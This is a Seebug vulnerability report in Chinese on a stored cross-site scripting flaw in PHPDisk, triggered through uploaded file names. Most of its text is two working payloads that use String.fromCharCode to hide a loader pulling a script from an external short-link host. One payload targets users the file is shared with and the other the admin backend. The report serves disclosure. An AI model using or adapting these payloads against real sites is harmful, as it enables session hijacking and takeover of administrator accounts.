phpdisk某处存储型XSS

2014-05-15T00:00:00
ID SSV:95387
Type seebug
Reporter Root
Modified 2014-05-15T00:00:00

Description

简要描述:

指哪打哪,可打后台

详细说明:

linux下可以使用<>作为文件名 上传一个名字为

&lt;img src="1"onerror="window.s=document.createElement(String.fromCharCode(115,99,114,105,112,116));window.s.src=String.fromCharCode(104,116,116,112,58,47,47,116,46,99,110,47,56,115,51,118,66,49,54);document.body.appendChild(window.s)"&gt;

的文件共享给好友就可以指谁X谁 假如要X后台上传文件名为

"&lt;/a&gt;&lt;img src="1"onerror="window.s=document.createElement(String.fromCharCode(115,99,114,105,112,116));window.s.src=String.fromCharCode(104,116,116,112,58,47,47,116,46,99,110,47,56,115,51,118,66,49,54);document.body.appendChild(window.s)"&gt;

偷懒代码就不审计了

漏洞证明:

<img src="https://images.seebug.org/upload/201405/01205001b75335b69b47b4bcaecaa3a0caea597d.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">

<img src="https://images.seebug.org/upload/201405/01204819dc4b5ff9fffe3d0f6b22a4095755e9a5.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">